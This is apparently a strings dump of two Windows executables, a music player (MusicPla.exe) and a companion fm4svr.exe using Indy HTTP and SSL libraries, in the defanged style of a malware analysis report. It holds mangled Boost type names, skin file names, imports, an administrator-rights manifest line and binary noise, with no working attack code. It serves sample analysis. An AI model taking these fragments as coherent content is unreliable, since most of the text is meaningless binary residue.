.?AU?$concrete_parser@U?$positive@U?$contiguous@U?$confix_parser@U?$chlit@D@classic@spirit@boost@@U?$kleene_star@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@U1234@Uunary_parser_category@234@Unon_nested@234@Unon_lexeme@234@@classic@spirit@boost@@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$sequence@U?$optional@U?$chlit@D@classic@spirit@boost@@@classic@spirit@boost@@U?$alternative@U?$chlit@D@classic@spirit@boost@@U?$sequence@U?$range@_W@classic@spirit@boost@@U?$kleene_star@Udigit_parser@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$sequence@V?$chset@_W@classic@spirit@boost@@U?$optional@V?$chset@_W@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@Ua_name@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$chlit@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_s@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$alternative@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$list_parser@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@U?$chlit@D@234@Uno_list_endtoken@234@Uplain_parser_category@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$alternative@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@V1234@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Uend_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AV?$sp_counted_impl_p@U?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@@detail@boost@@
%Program Files%\FM4.0\201409180317\fm4.exe
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:AF7207EBFCA7E211A4BAB609526B9429" xmpMM:DocumentID="xmp.did:0CCE7CECA7FD11E292E997ACCC5A275E" xmpMM:InstanceID="xmp.iid:0CCE7CEBA7FD11E292E997ACCC5A275E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AF7207EBFCA7E211A4BAB609526B9429" stRef:documentID="xmp.did:AF7207EBFCA7E211A4BAB609526B9429"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
#%DSZ
k/.ea"#>Nn
W%u3>C
f9Ky.RW`
125x125.jpg
L.Xkj
320x225.png
astop.png}W
back.png
bg2.png}SOh
bg3.png
bg_2.png}S]H
bk.png|
I[CsS%SC
.qO9M
t%7UfEa
zC%f 
]#%Sj
J%XDU@}T
8i.aV;
%fiHZZ9
3Nv%F
R%cV}V
mD%SK'l9
QC
bkcolor_1.png
bkcolor_2.png
bkcolor_3.png
bkcolor_4.png
bkcolor_5.png
bkcolor_6.png
bkcolor_7.png
border.png
L9q
btn-anonymity.png}
[).XF
'q.CAqK
btn-delete.png
btn-fav.png}Wy8
btn-login.png}
btn-login2.png
[%*,\4>66
%S;&DN
btn-next.png
btn-pause.png}X
btn-play.png
BtnHidePlayList.png
BtnRightTop.png
btn_9k.png}Wy8
btn_bd.png}Xy8
btn_close.png}Vy8
btn_comm.png
btn_db.png}W
btn_fh.png}XwT
btn_kw.png}
btn_ok.png}W
l[O{#. %x
btn_ok_blue.png
btn_ok_red.png}
btn_sc.png
=%uIS
btn_xm.png}X
button.png
channel.png
close.png
collection.png
ðxEuJxg
color_list_bk.png
\dl
dash.png}SM
DefaultUserImage.jpg
%S]wF
downd.png
downda.png
downdahover.png
DownLoadProgressForeImage.png
exit.png}U
fbcaptionbk.png
feedback.png}V
>/.Yhi
font_bkcolor.png
font_forecolor.png
forecolor_1.png
forecolor_2.png
forecolor_3.png
forecolor_4.png
.IDATx
forecolor_5.png
forecolor_6.png
forecolor_7.png
forgettt.jpg
frmdownmenu.xml
FrmDropDownMenuFrame.xml
FrmFeedBack.xmle
FrmHotKeyTip.xmlu
frmlogin.xml
FrmLrcChild.xmlU
FrmMenuFrame.xml
frmplayer.xml
frmplaylist.xml
frmProgressToolTip.xmlUPKN
frmWebBrowser.xml=
frmWindowLrc.xml%M1
frmWindowLrcParent.xml%
headimg.png}
d%U(.6
tG%C*
history.png
home.png}VgTS
hotkeytipbk.png
icon.png
input-password.png}U
input-user.png
like.png
!\Un%x
list.png
lista.png
D-wjÓ 
listahover.png
list_item_bg.png}S
list_pause.png
list_play.png
list_scroll_bar.png}SmH
list_scroll_bar2.png}S_H
{òC
list_title_bg.png}S
loading01.png
loading02.png
loading03.png
loading04.png
LoginBk.png
%S%hu.Y
g).IQ
LrcBk.png
u-3H}.
lrclist.png}Xy8
@.xn?
lyricdelete.png
lyricdeletea.png
lyricdeletea2.png
LyricFrameVoice.png
lyricmute.png
lyrictoplay.png
mainframeshadow.png
3.jUj
max.png
menu.png
min.png}SOh
mine.png
minea.png
mineahover.png
mini.png
mE)iVA.nP
more.png}SOH
musiclibrary.png
next.png}ViTSg
next0520.png
normalVolume.png}U
%DZRlj
play0520.png
play2.png
playerbg01.png
playerbg02.png
playerlist.png}X
playersidebg.jpg
playinging.jpg
playinginga.jpg
".Wlm
playingnext.png
playingplaying.jpg
playingprev.jpg
playingpreva.jpg
playingrandom.jpg
playingrandoma.jpg
playingvoice.png}V
PlayProgressForeImage.png
pl_back.png}S_h
pl_bg.png
pl_big.png
pl_btn_down.png}Tih
pl_btn_on.png
pl_close.png}S[H
pl_color.png
pl_desktop.png
pl_feedback.png}SKL
pl_forward.png}S_H
pl_icon.png}Wy8
pl_itself.png
pl_mutevol.png
pl_next.png}S_h
pl_pause.png}SKh
pl_prev.png
pl_res.png
pl_set.png
pl_small.png}Tmh
pl_split.png}S_h
pl_vol.png
pop_bkimage.png}U
power.png}XgTS
,&.,&#/!./*
prev.png}ViTS
prev0520.png
prevention.png
progresstooltip.png
progresstooltipbk.png
.ZfDrhe
T%s61K
m;.rA
progress_fore.png
pushedVolume.png
random.jpg
random01.jpg
random01a.jpg
random01hover.jpg
random02.jpg
random02a.jpg
random02hover.jpg
random03.jpg
random03a.jpg
random03hover.jpg
random0520.png
reflash.png
remembertt.jpg
scrollbar.png
search.png
E.Eg/&
SelectColor_SliderBar_Thumb.png
5).uZ
slider_bg.png
sound (2).jpg
sound.jpg
sound100.jpg
steup.png}
suspensionbig.png
suspensionbiga.png
suspensionbigahover.png
suspensionclose.png
suspensionclosea.png
suspensioncloseahover.png
suspensionfeedback.png
suspensionfeedbacka.png
suspensionfeedbackahover.png
suspensionlogin.png
suspensionmin.png
suspensionmina.png
suspensionminahover.png
suspensionset.png
suspensionseta.png
suspensionsetahover.png
suspensiontop.png
suspensiontopa.png
suspensiontopahover.png
system_menu_btnexit.png
system_menu_btnfeedback.png}V
system_menu_btnmin.png
;7%2uf
system_menu_btnmini.png
system_menu_btnsteup.png}
system_menu_btntop.png}W
sys_check_btn.png
sys_check_btn_blue.png
sys_check_btn_red.png
sys_check_btn_whiter.png
tab_comm.png
tooltipbk.png
update.xml
voice00528.png
voice0520.png
voice0a0528.png
voice1000528.png
voiceall0528.png
astop.png
bg2.png
bg_2.png
bk.png
btn-anonymity.png
btn-fav.png
btn-login.png
btn-pause.png
btn_9k.png
btn_bd.png
btn_close.png
btn_db.png
btn_fh.png
btn_kw.png
btn_ok.png
btn_ok_red.png
btn_xm.png
dash.png
exit.png
feedback.png
frmProgressToolTip.xml
frmWebBrowser.xml
headimg.png
home.png
input-password.png
list_item_bg.png
list_scroll_bar.png
list_scroll_bar2.png
list_title_bg.png
lrclist.png
min.png
more.png
next.png
normalVolume.png
playerlist.png
playingvoice.png
pl_back.png
pl_btn_down.png
pl_close.png
pl_feedback.png
pl_forward.png
pl_icon.png
pl_next.png
pl_small.png
pl_split.png
pop_bkimage.png
power.png
prev.png
steup.png
system_menu_btnfeedback.png
system_menu_btnsteup.png
system_menu_btntop.png
.Zuxf
tCPS
$;y)#%s
.QsvC
.VvC v
lH)Qk%c
4n.Ei
,GA.GS
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
89u9
7!7,737[7
2$2*202;2
;'<9<@<[<
;*<3<;<^<
4S5U5]5d5j5p5v5
6o6Q6y6
=">)>0>7>>>
4"4'484[4
6%6X6_6f6m6t6z6
8%8X8
1 2-2i2
4]5
: :,:5:^:
;';2;6;;;
6 6$6(6,60646
8 8$8(8,80848
3 3$3(3,3034383<3@3
? ?$?(?,?0?4?8?<?@?
3 3$3(3,3034383<3
4 5$5(545
mscoree.dll
LKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Skin\bkcolor_1.png
Skin\forecolor_1.png
Skin\bkcolor_2.png
Skin\forecolor_2.png
Skin\bkcolor_3.png
Skin\forecolor_3.png
Skin\bkcolor_4.png
Skin\forecolor_4.png
Skin\bkcolor_5.png
Skin\forecolor_5.png
Skin\bkcolor_6.png
Skin\forecolor_6.png
Skin\bkcolor_7.png
Skin\forecolor_7.png
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/rapidxml.hpp
E:\zhuyicheng\boost_1_53_0\boost/optional/optional.hpp
!p.empty() && "Empty path not allowed for put_child."
errorUrl
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml.hpp
E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml_print.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/shared_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/scoped_ptr.hpp
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/impl/match.ipp
val.is_initialized()
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/match.hpp
c.stack.size() >= 1
Song.music_id
Song.artid
Song.name
Song.artist
Song.special
Song.artist_pic240
Song.mp3path
Song.mp3dl
hXXp://
=data.xcode
data.songList
E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/utility/impl/chset/range_run.ipp
r.is_valid()
tplayList.trackList
Assertion failed: %s, file %s, line %d
1.14.814.2
MusicPla.exe

fm4svr.exe_1392:




.idata
.rdata
P.FSM0
`.rsrc
P.FSM1
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
Uh.FB
USER32.DLL
comctl32.dll
uxtheme.dll
OnKeyDown
OnKeyPress
OnKeyUp
UrlMon
Proportional
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordteA
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
AutoHotkeys8~D
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
%s, ClassID: %s
ole32.dll
olepro32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
Uh.AF
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
TIdTCPConnection0
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile,}@
CertFile,}@
KeyFile
OnGetPasswordTGG
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTPx
TIdHTTPOnHeadersAvailable
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequestd
TIdHTTPProtocolx
TIdCustomHTTP
TIdCustomHTTPx
TIdHTTP`
TIdHTTP
HTTPOptionst
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
grfKeyState
TComTargetExecEvent
CmdGroup
nCmdID
nCmdexecopt
hhctrl.ocx
URLMON.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowserApph
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetHeight
bstrUrlContext
bstrUrl
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTopT
OnWindowSetWidth
OnWindowSetHeight
rcmDefault
rcmDebug
DontExecuteScripts
DontExecuteJava
